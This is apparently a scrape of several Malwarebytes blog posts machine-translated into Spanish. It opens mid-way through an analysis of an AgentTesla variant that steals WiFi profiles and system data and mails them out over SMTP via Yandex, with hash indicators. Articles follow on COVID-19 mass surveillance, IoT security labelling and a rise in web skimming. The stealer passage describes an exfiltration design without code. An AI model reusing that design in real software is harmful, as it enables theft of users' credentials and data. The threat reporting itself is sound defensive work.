Además de los perfiles WiFi, el ejecutable recopila información extensa sobre el sistema, incluidos clientes FTP, navegadores, descargadores de archivos e información de la máquina (nombre de usuario, nombre de la computadora, nombre del sistema operativo, arquitectura de la CPU, RAM) y los agrega a una lista (Figura 7 )

Figura 7. Lista de información recopilada

La información recopilada forma la sección del cuerpo de un mensaje SMTP en formato html (Figura 8):

Figura 8 Datos recopilados en formato html en el cuerpo del mensaje

Nota: Si la lista final tiene menos de tres elementos, no generará un mensaje SMTP. Si todo se verifica, finalmente se envía un mensaje a través de smtp.yandex.com, con SSL habilitado (Figura 9):

Figura 9. Crear mensaje Smtp

El siguiente diagrama muestra todo el proceso explicado anteriormente, desde la extracción de la primera carga útil del recurso de imagen hasta la exfiltración de la información robada a través de SMTP:

Figura 10. Diagrama de proceso

Ladrón popular que busca expandirse

Dado que AgentTesla agregó la función de robo de WiFi, creemos que los actores de la amenaza pueden estar considerando usar WiFi como un mecanismo de propagación, similar a lo que se observó con Emotet . Otra posibilidad es usar el perfil WiFi para preparar el escenario para futuros ataques.

De cualquier manera, los usuarios de Malwarebytes ya estaban protegidos de esta nueva variante de AgentTesla a través de nuestra tecnología de protección en tiempo real.

Indicadores de compromiso

Muestras de AgentTesla:

91b711812867b39537a2cd81bb1ab10315ac321a1c68e316bf4fa84badbc09b 
dd4a43b0b8a68db65b00fad99519539e2a05a3892f03b869d58ee15fdf5aa044 
27939b70928b285655c863fa26efded96bface9db46f35ba39d2a1295424c07b

Primera carga útil:

249a503263717051d62a6d65a5040cf408517dd22f9021e5f8978a819b18063b

Segunda carga útil: 

63393b114ebe2e18d888d982c5ee11563a193d9da3083d84a611384bc748b1b0
Pormalwarebytes

La vigilancia masiva por sí sola no nos salvará del coronavirus

La vigilancia masiva por sí sola no nos salvará del coronavirus

La vigilancia masiva por sí sola no nos salvará del coronavirus

Al corriente: por 

A medida que la verdad que rompe los patrones de nuestras nuevas vidas se agota, a medida que el coronavirus desgarra las rutinas, ataca nuestro bienestar y nos agita entre la ansiedad y el miedo, no debemos mirar a la vigilancia digital masiva para volver a la normalidad.

Los gobiernos ya han lanzado grandes redes digitales . Los surcoreanos son rastreados a través del historial de ubicación de GPS, transacciones de tarjetas de crédito y filmaciones de cámaras de vigilancia. Los israelíes supieron el mes pasado que sus ubicaciones de dispositivos móviles fueron recolectadas subrepticiamente durante años. Ahora, el gobierno hurga en esta enorme base de datos a plena luz del día, esta vez para rastrear la propagación de COVID-19. Los rusos no pueden salir de casa en algunas regiones sin escanear códigos QR que restringen el tiempo que pasan afuera: tres horas para comprar comestibles, una hora para pasear al perro, la mitad para sacar la basura.

Los defensores de la privacidad en todo el mundo han dado la voz de alarma. Este mes, más de 100 organizaciones de derechos civiles y digitales instaron a que los mecanismos de vigilancia dirigidos a los coronavirus de cualquier gobierno respeten los derechos humanos. Los grupos, que incluían Privacy International, Human Rights Watch, Open Rights Group y la organización sin fines de lucro chilena Derechos Digitales, escribieron en una carta conjunta :

“La tecnología puede y debe desempeñar un papel importante durante este esfuerzo para salvar vidas, como difundir mensajes de salud pública y aumentar el acceso a la atención médica. Sin embargo, un aumento en los poderes estatales de vigilancia digital, como la obtención de acceso a los datos de ubicación de los teléfonos móviles, amenaza la privacidad, la libertad de expresión y la libertad de asociación, en formas que podrían violar los derechos y degradar la confianza en las autoridades públicas, socavando la efectividad de cualquier público respuesta de salud «.

Los grupos tienen razón en preocuparse.

Particularmente en los Estados Unidos, la historia de vigilancia de emergencia habilitada en nuestro país no ha respetado el derecho de los estadounidenses a la privacidad y no ha brindado una mayor seguridad medible. La autorización de vigilancia rápida en los EE. UU. No solo permitió la recopilación, en un momento dado, de casi todos los registros detallados de llamadas de los estadounidenses, sino que también creó un programa gubernamental difícil de manejar que dos décadas después se volvió ineficaz, económicamente costoso y repetidamente incumplido por la ley .

Además, algunas de las propuestas actuales de seguimiento de la tecnología, incluidas las capacidades Bluetooth recientemente anunciadas por Apple y Google, carecen de la evidencia para demostrar su eficacia o requieren un grado de adopción masiva que ningún país ha demostrado que sea posible. Otras propuestas privadas también provienen de actores no confiables.

Finalmente, las soluciones centradas en la tecnología no pueden por sí solas llenar brechas físicas severas, incluida la falta de equipo de protección personal para profesionales médicos, pruebas universales inexistentes y una selección potencialmente fatal de camas de unidades de cuidados intensivos que quedan para sobrevivir a un brote en todo el país.

Entendemos cómo se siente hoy. En menos de un mes, el mundo se ha vaciado. Iglesias, aulas, teatros y restaurantes yacían vacíos, a veces cerrados por tablones de madera sujetos a las puertas. Lamentamos la pérdida de familiares y amigos, de 17 millones de empleos estadounidenses y los beneficios de atención médica que proporcionaron, de redes nacionales de apoyo en persona desplazadas al ciberespacio, donde el tipo de vulnerabilidad para una sala física ahora está en línea .

Durante un tiempo aparentemente interminable en casa, nos acurrucamos y esperamos, vaciados de todos modos.

Pero la vigilancia masiva y digital por sí sola no nos hará completos.

Los gobiernos amplían la vigilancia para rastrear el coronavirus

Detectado por primera vez a fines de 2019 en la provincia china de Hubei, COVID-19 ahora se ha extendido por todos los continentes, excepto la Antártida.

Para limitar la propagación del virus y prevenir sistemas de salud sobrecargados, los gobiernos impusieron una variedad de restricciones físicas. California cerró todos los negocios no esenciales, Irlanda restringió el ejercicio al aire libre a 1.2 millas de distancia de su hogar, El Salvador colocó cuarentenas de 30 días a los salvadoreños que ingresan al país desde el extranjero, y Túnez impuso un horario nocturno de 6:00 p.m. a 6:00 a.m. toque de queda.

Un puñado de gobiernos tomó medidas digitales, aspirando los datos de los teléfonos celulares de los ciudadanos, a veces incluyendo su historial de ubicación aproximada.  

El mes pasado, Israel desabotonó un programa de vigilancia que alguna vez fue secreto, lo que le permitió acceder a los teléfonos móviles de los israelíes no para proporcionar medidas contra el terrorismo, como se reservaba anteriormente, sino para rastrear la propagación de COVID-19 . El gobierno planea usar los datos de ubicación del teléfono celular que había estado recolectando de manera privada de los proveedores de telecomunicaciones para enviar mensajes de texto a los propietarios de dispositivos que potencialmente entren en contacto con los proveedores de coronavirus conocidos. Según The New York Times, el subcomité parlamentario destinado a aprobar las restricciones relajadas del programa en realidad nunca votó .

La región italiana de Lombardía, que, hasta hace poco, sufrió la mayor ola de coronavirus fuera de China, está trabajando con una importante empresa de telecomunicaciones para analizar los datos de ubicación de teléfonos celulares anonimizados para comprender si las medidas de bloqueo físico están demostrando ser eficaces para combatir el virus. El gobierno austriaco está haciendo lo mismo . Del mismo modo, el gobierno paquistaní depende de la información de ubicación proporcionada por el proveedor para enviar mensajes SMS específicos a cualquier persona que haya entrado en contacto físico cercano con pacientes confirmados de coronavirus. El programa solo puede ser tan efectivo como grande, ya que requiere datos sobre grandes extensiones de población del país.

En Singapur, el gobierno del país publica información extremadamente detallada sobre pacientes con coronavirus en su sitio web público del Ministerio de Salud. Las edades, los lugares de trabajo, las direcciones de los lugares de trabajo, el historial de viajes, las ubicaciones de los hospitales y las calles residenciales se pueden encontrar con un simple clic.

La estrategia de detección de coronavirus de Singapur también incluyó un componente clave separado.

El mes pasado, el gobierno lanzó una nueva aplicación móvil voluntaria para que los ciudadanos la descarguen llamada TraceTogether. La aplicación se basa en las señales de Bluetooth para detectar cuando un paciente confirmado de coronavirus se acerca físicamente a los propietarios de dispositivos que usan la misma aplicación. Es esencialmente un enfoque de alta tecnología para el trabajo de detective de baja tecnología de «rastreo de contactos», en el que los expertos médicos entrevistan a las personas con enfermedades infecciosas y determinan con quién hablaron, qué lugares visitaron y qué actividades realizaron durante varios días antes de presentar síntomas.

Estos ejemplos de mayor vigilancia y seguimiento del gobierno están lejos de ser excepcionales.

Según un análisis de Privacy International, al menos 23 países han implementado alguna forma de seguimiento de telecomunicaciones para limitar la propagación del coronavirus, mientras que 14 países están desarrollando o ya han desarrollado sus propias aplicaciones móviles, incluidas Brasil e Islandia , junto con Alemania y Croacia, que intentan crear aplicaciones compatibles con GDPR .

Mientras que algunos países han confiado en los proveedores de telecomunicaciones para suministrar datos, otros están trabajando con actores privados mucho más cuestionables.

La vigilancia rápida exige una infraestructura rápida e inestable

El mes pasado, el impulso para rastrear digitalmente la propagación del coronavirus provino no solo de los gobiernos, sino de las compañías que construyen tecnología potencialmente invasiva de la privacidad.

La semana pasada, Apple y Google anunciaron un esfuerzo conjunto para proporcionar capacidades de rastreo de contactos Bluetooth entre miles de millones de dispositivos iPhone y Android en el mundo.

Las dos compañías prometieron actualizar sus dispositivos para que los expertos en salud pública puedan desarrollar aplicaciones móviles que permitan a los usuarios identificar voluntariamente si han dado positivo por coronavirus. Si un usuario confirmado de la aplicación de coronavirus entra en contacto lo suficientemente cercano con los usuarios de la aplicación no infectados, estos últimos usuarios podrían ser notificados sobre una posible infección, ya sea que posean un iPhone o Android.

Tanto Apple como Google prometieron un enfoque de protección de la privacidad. Los usuarios de la aplicación no podrán rastrear sus ubicaciones, y Apple, Google y los gobiernos no podrán acceder a sus identidades. Además, los dispositivos cambiarán automáticamente los identificadores de los usuarios cada 15 minutos, un paso para evitar la identificación de los propietarios de los dispositivos. Los datos que se procesan en dispositivos nunca abandonarán un dispositivo a menos que un usuario decida compartirlo.  

En términos de protección de la privacidad, el enfoque de Apple y Google es una de las mejores opciones hoy en día.

Según Bloomberg , la firma israelí NSO Group lanzó una variedad de gobiernos en todo el mundo sobre una nueva herramienta que supuestamente puede rastrear la propagación del coronavirus. A mediados de marzo, alrededor de una docena de gobiernos comenzaron a probar la tecnología.

Una investigación de seguimiento realizada por VICE reveló cómo funciona la nueva herramienta, con nombre en código «Fleming» :

“Fleming muestra los datos de lo que parece una interfaz de usuario intuitiva que permite a los analistas rastrear a dónde van las personas, a quién se encuentran, por cuánto tiempo y dónde. Todos estos datos se muestran en mapas de calor que se pueden filtrar según lo que el analista quiera saber. Por ejemplo, los analistas pueden filtrar los movimientos de un determinado paciente por su última ubicación o si visitaron algún lugar de reunión como plazas públicas o edificios de oficinas. Con el objetivo de proteger la privacidad de las personas, la herramienta rastrea a los ciudadanos asignándoles identificaciones aleatorias, que el gobierno, cuando sea necesario, puede anonimizar [.] «

Estos son poderes peligrosos e invasivos que cualquier gobierno puede usar contra sus ciudadanos. Las preocupaciones de privacidad solo crecen cuando se mira la historia reciente de NSO Group. En 2018, la compañía fue demandada por acusaciones de que utilizó su poderosa tecnología de software espía para ayudar al gobierno de Arabia Saudita a espiar y planear el asesinato del ex escritor del Washington Post y disidente saudí Jamal Khashoggi. El año pasado, NSO Group fue golpeado con una importante demanda de Facebook, alegando que la compañía envió malware a más de 1,400 usuarios de WhatsApp , que incluyeron periodistas, activistas de derechos humanos y funcionarios del gobierno.  

Las cuestionables asociaciones público-privadas no terminan ahí.

Según The Wall Street Journal , la startup de reconocimiento facial Clearview AI, que afirma tener la mayor base de datos de imágenes digitales públicas, está trabajando con agencias estatales de EE. UU. Para rastrear a aquellos que dieron positivo por coronavirus.

La startup con sede en Nueva York se ha jactado repetidamente de su tecnología, diciendo anteriormente que ayudó al Departamento de Policía de Nueva York a identificar rápidamente a un sospechoso de terrorismo. Pero cuando Buzzfeed News le preguntó al departamento de policía sobre ese reclamo, negó que Clearview participara en el caso .

Además, según una investigación del Huffington Post , la historia de Clearview involucra la coordinación con extremistas de extrema derecha, uno de los cuales marchó en la manifestación «Unite the Right» en Charlottesville, otro que promovió teorías de conspiración desacreditadas en línea, y otro que es un neoconocido declarado. Nazi. Uno de los primeros asesores de la startup vio una vez su tecnología de reconocimiento facial como una forma de «identificar a todos los extranjeros ilegales en el país».

Aunque Clearview le dijo a The Huffington Post que se separó de estos extremistas, su fundador Hoan Ton-That parece no estar equipado para lidiar con las preguntas de privacidad más amplias que invita su tecnología. Cuando fue entrevistado a principios de este año por The New York Times, Ton-That se vio con los pies abiertos ante preguntas obvias sobre la capacidad de espiar a casi cualquier persona con presencia en línea. Como el periodista Kashmir Hill escribió:

“Incluso si Clearview no hace que su aplicación esté disponible públicamente, una compañía imitadora podría hacerlo, ahora que el tabú está roto. Buscar a alguien por la cara podría ser tan fácil como buscar un nombre en Google. Los extraños podrían escuchar conversaciones delicadas, tomar fotos de los participantes y conocer secretos personales. Alguien caminando por la calle sería inmediatamente identificable, y la dirección de su casa estaría a solo unos clics de distancia. Anunciaría el fin del anonimato público.

Cuando se le preguntó sobre las implicaciones de traer tal poder al mundo, Ton-That pareció desconcertado.

«Tengo que pensar en eso», dijo. «Creemos que este es el mejor uso de la tecnología».

Las creencias de una compañía acerca de cómo «utilizar» mejor la tecnología invasiva es una barra demasiado baja para que podamos construir un mecanismo de vigilancia.

¿Deberíamos desplegar vigilancia masiva?

En medio de la actual crisis de salud, varias organizaciones de derechos digitales y privacidad han intentado responder a la pregunta de si los gobiernos deberían desplegar vigilancia masiva para combatir el coronavirus. Lo que ha surgido, en lugar de las aprobaciones u objeciones al por mayor a los programas de vigilancia individuales en todo el mundo, es un marco para evaluar los programas entrantes.

Según Privacy International y más de 100 grupos similares , la vigilancia del gobierno para combatir el coronavirus debe ser necesaria y proporcionada, solo debe continuar durante el tiempo de la pandemia, solo debe usarse para responder a la pandemia, debe tener en cuenta la posible discriminación causada por artificial tecnologías de inteligencia, y debe permitir a las personas desafiar cualquier recopilación, agregación, retención y uso de datos, entre otras restricciones.

Electronic Frontier Foundation, que no firmó la carta de Privacy International, publicó una lista algo similar de restricciones de vigilancia y redujo aún más su evaluación a una simple rúbrica de tres preguntas :  

  • Primero, ¿ha demostrado el gobierno que su vigilancia sería efectiva para resolver el problema?
  • En segundo lugar, si el gobierno muestra eficacia, preguntamos: ¿La vigilancia haría demasiado daño a nuestras libertades?
  • Tercero, si el gobierno muestra eficacia y el daño a nuestras libertades no es excesivo, preguntamos: ¿Hay suficientes barandas alrededor de la vigilancia? (Que la organización detalla aquí .)

No reclamamos una visión más aguda que nuestros pares de privacidad digital. De hecho, gran parte de nuestra investigación se basa en la suya. Pero al centrarnos en los tipos de vigilancia instalados actualmente y en la vigilancia anterior instalada hace años, erramos con cautela contra cualquier régimen de vigilancia masiva desarrollado específicamente para rastrear y limitar la propagación del coronavirus.

De plano, el despliegue rápido de vigilancia masiva para proteger al público rara vez, si es que alguna vez, ha funcionado según lo previsto. La vigilancia masiva no ha «resuelto» una crisis, y en los Estados Unidos, un régimen de vigilancia de emergencia se convirtió en un buque de guerra hinchado, ineficaz y no conforme, aparentemente sin timón hoy.

No debemos tomar estos mismos riesgos nuevamente.

Las lecciones de la Sección 215

El 4 de octubre de 2001, menos de un mes después de que Estados Unidos sufriera el peor ataque en suelo estadounidense cuando los terroristas derribaron las torres del World Trade Center el 11 de septiembre, el presidente George W. Bush autorizó a la Agencia de Seguridad Nacional a recopilar ciertos contenidos y metadatos del teléfono sin primero obteniendo warrants.

Según el borrador del informe de trabajo del Inspector General de la NSA , la autorización del presidente Bush se tituló «Autorización para actividades específicas de vigilancia electrónica durante un período limitado para detectar y prevenir actos de terrorismo dentro de los Estados Unidos».

En 2006, los poderes descritos de «período limitado» continuaron, ya que el Fiscal General Alberto González argumentó ante un tribunal secreto que el tribunal debería legalizar retroactivamente lo que la NSA había estado haciendo durante cinco años: recopilar los metadatos de llamadas telefónicas de casi todos los estadounidenses, potencialmente reveladores los números que llamamos, la frecuencia con que los marcamos y por cuánto tiempo hablamos. El tribunal luego aprobó la solicitud.

Los argumentos del Fiscal General citaron parcialmente una ley separada aprobada por el Congreso en 2001 que introdujo una nueva autoridad de vigilancia para la NSA titulada Sección 215, que permite la recopilación de «registros de detalles de llamadas», que son registros de llamadas telefónicas, pero no llamadas telefónicas. contenido. Aunque la Sección 215 recibió reformas significativas en 2015, aún persiste. Solo recientemente el público se enteró de las fallas de cobranza bajo su autoridad.

En 2018, la NSA borró cientos de millones de registros detallados de llamadas y textos recopilados en la Sección 215 porque la NSA no pudo conciliar su recopilación con los requisitos reales de la ley . En febrero, el público también se enteró de que, a pesar de recopilar innumerables registros a lo largo de cuatro años, solo la NSA descubrió información que el FBI aún no tenía . De esas dos ocasiones, solo una vez la información condujo a una investigación.

Para complicar el asunto es el hecho de que la NSA cerró el programa de registro de detalles de llamadas en el verano de 2019, pero la autoridad legal del programa permanece en el limbo, ya que el Senado aprobó una extensión de 77 días a mediados de marzo , pero la Cámara de Representantes No está previsto que regrese al Congreso hasta principios de mayo.

Si esto suena frustrante, lo es, y los senadores y representantes de ambas partes han cuestionado cada vez más estos poderes de vigilancia.

Recuerde, así de difícil es desmontar una máquina de vigilancia con fallas comprobadas. Dudamos que sea más fácil desmantelar cualquier régimen que instale el gobierno para combatir el coronavirus.

Aparte de nuestra historia reciente de vigilancia demasiado extendida, está la cuestión de si la recopilación de datos realmente funciona para rastrear y limitar el coronavirus.

Hasta ahora, los resultados varían de poco claros a mixtos.

Los problemas de localización y seguimiento de proximidad.

En 2014, funcionarios gubernamentales, tecnólogos y grupos humanitarios instalaron grandes regímenes de recopilación de datos para rastrear y limitar la propagación del brote de ébola en África occidental.

La Escuela de Salud Pública de Harvard utilizó los «pings» de los teléfonos celulares para trazar estimaciones aproximadas de las ubicaciones de las personas que llaman en función de las torres celulares a las que se conectaban al hacer llamadas. Los Centros para el Control y la Prevención de Enfermedades de EE. UU. Analizaron de manera similar las torres celulares que recibieron un gran número de llamadas telefónicas de emergencia para determinar si se estaba produciendo un brote casi en tiempo real.

Pero según Sean McDonald, del Centro Berkman Klein para Internet y Sociedad de la Universidad de Harvard, existe poca evidencia que muestre si el rastreo de ubicación ayuda a prevenir la propagación de enfermedades.

En un prólogo de su artículo de 2016 » Ébola: un gran desastre de datos «, McDonald analizó la respuesta de Corea del Sur en 2014 al Síndrome Respiratorio del Medio Oriente (MERS), un coronavirus separado. Para limitar la propagación, el gobierno de Corea del Sur obtuvo información de individuos de los proveedores de telefonía móvil del país e implementó una cuarentena en más de 17,000 personas en función de su ubicación y las probabilidades de infección.

Pero el gobierno de Corea del Sur nunca habló sobre cómo usaba los datos de los ciudadanos, escribió McDonald.

«Lo que no sabemos es si esa captura de información resultó en un bien público», escribió McDonald. «Todo lo contrario, hay evidencia limitada que sugiere que la información de migración o ubicación es un predictor útil de la propagación de MERS».

Además, los esfuerzos recientes para proporcionar el rastreo de contactos a través de la conectividad Bluetooth, que no es lo mismo que el rastreo de ubicación, no se han probado en una escala lo suficientemente grande como para demostrar su eficacia.

Según un informe de The Economist de mediados de marzo, solo el 13 por ciento de la población de Singapur había instalado la aplicación de rastreo de contactos del país, TraceTogether. El número bajo se ve peor cuando se mide el éxito en la lucha contra el coronavirus.

Según The Verge, si los estadounidenses instalaran una aplicación de rastreo de contactos Bluetooth a la misma velocidad que los singapurenses, la probabilidad de recibir una notificación porque un encuentro casual con otro usuario de la aplicación sería solo del 1.44 por ciento .  

Peor aún, según el Dr. Farzad Mostashari, ex coordinador nacional de tecnología de información de salud del Departamento de Salud y Servicios Humanos, el rastreo de contactos por Bluetooth podría crear muchos falsos positivos. Como le dijo a The Verge:

“Si estoy a la intemperie, mi Bluetooth y tu Bluetooth pueden hacer ping entre sí, incluso si estás a más de seis pies de distancia. Podrías atravesarme la pared en un apartamento, y podría hacer ping que estamos teniendo un evento de proximidad. Podrías estar en  un piso diferente del edificio  y podría hacer ping ”.

Esto no significa que el rastreo de contactos Bluetooth sea una mala idea, pero no es la bala de plata que algunos imaginan. Hasta que sepamos si el seguimiento de ubicación funciona, podríamos suponer lo mismo.

Mantenerse a salvo

Hoy es agotador y, lamentablemente, mañana también lo será. No tenemos las respuestas para que las cosas vuelvan a la normalidad. No sabemos si esas respuestas existen.

Lo que sí sabemos es que, comprensiblemente, ahora es un momento de miedo. Eso es normal. Eso es humano.

Pero debemos evitar dejar que el miedo dicte decisiones con un significado como este. En el pasado, la vigilancia masiva se volvió difícil de manejar, duró más de lo planeado y resultó ineficaz. Hoy en día, está siendo impulsado por actores privados oportunistas en los que no debemos confiar como los únicos guardianes de los poderes ampliados del gobierno.

No tenemos pruebas de que la vigilancia masiva por sí sola resuelva esta crisis. Solo el miedo nos permite creer que lo hará.

Pormalwarebytes

Esquema de etiquetado de ciberseguridad introducido para ayudar a los usuarios a elegir dispositivos IoT seguros

Esquema de etiquetado de ciberseguridad introducido para ayudar a los usuarios a elegir dispositivos IoT seguros

Esquema de etiquetado de ciberseguridad introducido para ayudar a los usuarios a elegir dispositivos IoT seguros

Al corriente: por 

Internet de las cosas (IoT) es un término utilizado para describir una amplia variedad de dispositivos que están conectados a Internet para mejorar la experiencia del usuario. Por ejemplo, un timbre se convierte en parte del IoT cuando se conecta a Internet y permite a los usuarios ver a los visitantes fuera de su puerta.

Pero la forma en que algunos de estos dispositivos IoT se conectan genera serias preocupaciones de seguridad y privacidad . Esto ha llevado a peticiones de leyes y regulaciones en la producción y comercialización de dispositivos IoT, que incluyen características de seguridad mejoradas y una mejor visibilidad de la seguridad de esas características.

Nuestros leales lectores han visto nuestras quejas habituales sobre la seguridad integrada de los dispositivos IoT y saben lo preocupados que estamos por los productos que están diseñados para optimizar la funcionalidad y el costo sobre la seguridad. Muchos fabricantes esperan que los consumidores se preocupen más por la facilidad de uso que por la seguridad.

Pero si bien esto puede ser cierto para muchos consumidores, la aparente indiferencia también puede explicarse por la falta de opciones comparables. Si los consumidores tuvieran la opción de elegir entre un dispositivo que sea barato, fácil de usar e inseguro y un dispositivo que sea un poco más costoso pero que mantenga a los usuarios protegidos, nuestra apuesta es que habría una buena parte de los consumidores que seleccionarían el más seguro opción.

Si bien algunos estados y países tienen leyes que exigen que los fabricantes produzcan productos «seguros», esto no ayuda a los consumidores a tomar una decisión. En el mejor de los casos, limita su elección ya que algunos productos inseguros no llegarán al mercado. Para ayudar a los usuarios a tomar una decisión informada, algunos países han decidido introducir un nuevo esquema de etiquetado de ciberseguridad (CLS) que proporciona a los consumidores información sobre la seguridad de los dispositivos inteligentes conectados.

Países que introducen un esquema de etiquetado de ciberseguridad

En noviembre de 2019, Finlandia se convirtió en el primer país de Europa en otorgar certificados de seguridad de la información a dispositivos que pasaron las pruebas requeridas. Su razonamiento fue que el nivel de seguridad de los dispositivos en el mercado varía mucho, y no hay una manera fácil para que los consumidores sepan qué productos son seguros y cuáles no. Como servicio al público, se lanzó un sitio web para facilitar la búsqueda de información sobre los dispositivos que han recibido la etiqueta.

El 27 de enero de 2020, el ministro digital del Reino Unido, Matt Warman, anunció una nueva ley para proteger a millones de usuarios de IoT de la amenaza de ciberataque. El plan es asegurarse de que todos los dispositivos inteligentes de consumo vendidos en el Reino Unido cumplan con rigurosos requisitos de seguridad para Internet de las cosas (IoT).

Poco después del Reino Unido, la Agencia de Seguridad Cibernética de Singapur (CSA) anunció planes para introducir un nuevo Esquema de etiquetado de seguridad cibernética (CLS) a finales de este año para ayudar a los consumidores a tomar decisiones de compra informadas sobre dispositivos inteligentes conectados a la red.

Como parte de la iniciativa, CLS abordará la seguridad de los dispositivos IoT, un área creciente de preocupación. El CLS, que es el primero en la región de Asia y el Pacífico, se presentará por primera vez a dos tipos de productos: enrutadores WiFi y concentradores domésticos inteligentes.


Lectura recomendada: 8 formas de mejorar la seguridad en dispositivos domésticos inteligentes


Los objetivos de un esquema de etiquetado de ciberseguridad

El esquema de etiquetado de ciberseguridad se alineará con los estándares de seguridad aceptados globalmente para los productos de Internet de las cosas para consumidores. Significará que se introducirán estándares de seguridad sólidos desde la etapa de diseño y no se atornillarán como una ocurrencia tardía.

El esquema propone que dichos dispositivos deben llevar una etiqueta de seguridad para ayudar a los consumidores a navegar por el mercado y saber en qué dispositivos confiar, y para alentar a los fabricantes a mejorar la seguridad. La idea es que, de forma similar a cómo las etiquetas Bluetooth y WiFi ayudan a los consumidores a sentirse seguros de que sus productos funcionarán con protocolos de comunicación inalámbrica, una etiqueta de seguridad infundirá confianza en los consumidores de que su dispositivo fue construido de acuerdo con los estándares de seguridad.

El CLS de Singapur es el primer sistema de calificación de ciberseguridad de su tipo en la región APAC, y está dirigido principalmente a ayudar a los consumidores a tomar decisiones informadas. La calificación de un producto se decidirá en una serie de evaluaciones y pruebas que incluyen, entre otras:

  • Cumplir con los requisitos básicos de seguridad (por ejemplo, contraseñas predeterminadas únicas)
  • Adhesión a los principios de seguridad por diseño de software y hardware
  • Las vulnerabilidades comunes de seguridad del software deberían estar ausentes
  • Resistente a la actividad básica de pruebas de penetración.

Lo mismo es cierto para la ley que se está preparando para el Reino Unido. Sus requisitos de seguridad principales son:

  • Todas las contraseñas de dispositivos conectados a Internet del consumidor deben ser únicas y no reiniciables a ninguna configuración de fábrica universal.
  • Los fabricantes de dispositivos de IoT para consumidores deben proporcionar un punto de contacto público para que cualquiera pueda informar una vulnerabilidad, y se actuará de manera oportuna.
  • Los fabricantes de dispositivos de IoT para consumidores deben indicar explícitamente el período mínimo de tiempo durante el cual el dispositivo recibirá actualizaciones de seguridad en el punto de venta, ya sea en la tienda o en línea.

Como puede ver en ambos casos, la principal preocupación era la omnipresencia de contraseñas predeterminadas que eran las mismas para toda una serie de dispositivos. Y además de eso, los usuarios no fueron informados claramente de que necesitaban cambiar la contraseña predeterminada, y a menudo era difícil cambiarla para el usuario promedio.

Optimizando el CLS

Aplaudimos los esfuerzos realizados por los gobiernos para mejorar la seguridad general de los dispositivos IoT, pero hay algunas mejoras que nos gustaría sugerir.

  • El sitio finlandés está disponible en finlandés y sueco. Para un extraño, es difícil saber qué productos están aprobados y por qué. Una versión en inglés sería un gran paso adelante.
  • Las leyes en el Reino Unido y California son un buen comienzo, pero podrían haber sido más restrictivas. Y no informan a un cliente sobre la seguridad de un dispositivo cuando buscan comprar en una tienda web que podría estar en el extranjero.
  • El CLS de Singapur por ahora se enfoca en enrutadores y centros de hogares inteligentes porque los consideran las puertas de entrada al resto de la familia. Si bien esto tiene sentido, es un alcance limitado.

Lo que todas estas regulaciones tienen en común es que solo informan al cliente si un dispositivo ha pasado la lista en un determinado estado o país. Ciertamente, podemos llegar a un esquema global que ofrezca a los clientes un nivel de seguridad entre «no compre esto» y «muy seguro» como lo tenemos para la eficiencia energética en la UE.

Etiquetas energéticas de la UE

Pero alegrémonos por ahora de que estos gobiernos están comenzando en un esfuerzo muy necesario para mejorar los dispositivos e informar a los clientes. Esperemos que los diversos esquemas de etiquetado de seguridad ayuden a los consumidores a tomar una decisión informada e impulsen a los fabricantes a centrarse más en la seguridad. Y que otros gobiernos seguirán sus ejemplos.

Pormalwarebytes

El descremado de tarjetas de crédito en línea aumentó un 26 por ciento en marzo

El descremado de tarjetas de crédito en línea aumentó un 26 por ciento en marzo

El descremado de tarjetas de crédito en línea aumentó un 26 por ciento en marzo

Al corriente: por 

Se sabe que los delincuentes aprovechan los eventos que captan la atención de las personas. Esto es cierto para cualquier tipo de ataque que se base en la ingeniería social, como los correos electrónicos de phishing que explotan la pandemia de Covid-19 .

Ciertos eventos, como la crisis actual, no solo llaman la atención de los actores de amenazas, sino que también conducen a cambios en los hábitos. Caso en cuestión, con las medidas de confinamiento impuestas en muchos países, las compras en línea se han disparado .

Si bien muchos comerciantes permanecen seguros a pesar del aumento en el volumen de transacciones procesadas, la exposición a tiendas de comercio electrónico comprometidas es mayor que nunca.

En esta publicación de blog, publicamos algunos datos recientemente obtenidos que muestran que el número de personas expuestas a skimmers digitales ha aumentado en un 26% de febrero a marzo. Si bien este no es un salto dramático, la oferta de tarjetas de crédito robadas ya ha aumentado y es probable que continúe en esta tendencia.

El cambio en los hábitos se traduce en intentos adicionales de descremado web

El descremado web, también conocido bajo diferentes términos, pero popularizado gracias al apodo de ‘Magecart’, es el proceso de robo de datos de clientes, incluida información de tarjetas de crédito, de tiendas en línea comprometidas.

Realizamos un seguimiento activo de los skimmers web para proteger a nuestros clientes que ejecutan Malwarebytes o Browser Guard (la extensión del navegador) cuando compran en línea.

Las estadísticas que se presentan a continuación excluyen cualquier telemetría de nuestra extensión Browser Guard y reflejan una parte del panorama general de navegación web, según nuestra propia visibilidad. Por ejemplo, los skimmers del lado del servidor no serán contabilizados, a menos que el sitio del comerciante se haya identificado como comprometido y esté en la lista negra.

Una tendencia que hemos notado durante un tiempo es cómo la cantidad de bloques de descremado es más alta los lunes, bajando en la segunda mitad de la semana y estando en su punto más bajo los fines de semana.

La segunda observación es cómo el número de bloques de descremado web aumentó moderadamente de enero a febrero (2.5%) pero luego comenzó a aumentar de febrero a marzo (26%). Si bien esto sigue siendo un aumento moderado, creemos que marca una tendencia que será más evidente en los próximos meses.

El cuadro final muestra que registramos los intentos más desnatadores en los EE. UU., Seguidos de Australia y Canadá. Esta tendencia coincide con las medidas de cuarentena que comenzaron a implementarse a mediados de marzo.

Minimizar riesgos: una responsabilidad compartida

Como vemos con otras amenazas, no hay una respuesta para mitigar el descremado web. De hecho, se puede luchar desde muchos lados diferentes, comenzando con los comerciantes en línea, la comunidad de seguridad y los propios compradores.

Un gran número de comerciantes no mantienen sus plataformas actualizadas y tampoco responden a las divulgaciones de seguridad. Muchas veces, el último recurso para denunciar una violación es hacer público y esperar que la atención de los medios dé frutos.

Muchos proveedores de seguridad rastrean activamente los skimmers web y agregan capacidades de protección a sus productos. Este es el caso de Malwarebytes, y la protección web está disponible tanto en nuestro producto de escritorio como en la extensión del navegador . Compartir nuestros hallazgos e intentar alterar la infraestructura de descremado es eficaz para abordar el problema a escala, en lugar de hacerlo individualmente (por sitio).

Comprar en línea es conveniente pero no está libre de riesgos. En última instancia, los usuarios son los que pueden tomar decisiones inteligentes y evitar muchas trampas. Aquí hay algunas recomendaciones:

  • Limite la cantidad de veces que tiene que ingresar manualmente los datos de su tarjeta de crédito. Confíe en plataformas donde esa información ya esté almacenada en su cuenta o use opciones de pago únicas.
  • Compruebe si la tienda en línea se muestra correctamente en su navegador, sin ningún error o ciertas banderas rojas que indiquen que se ha descuidado.
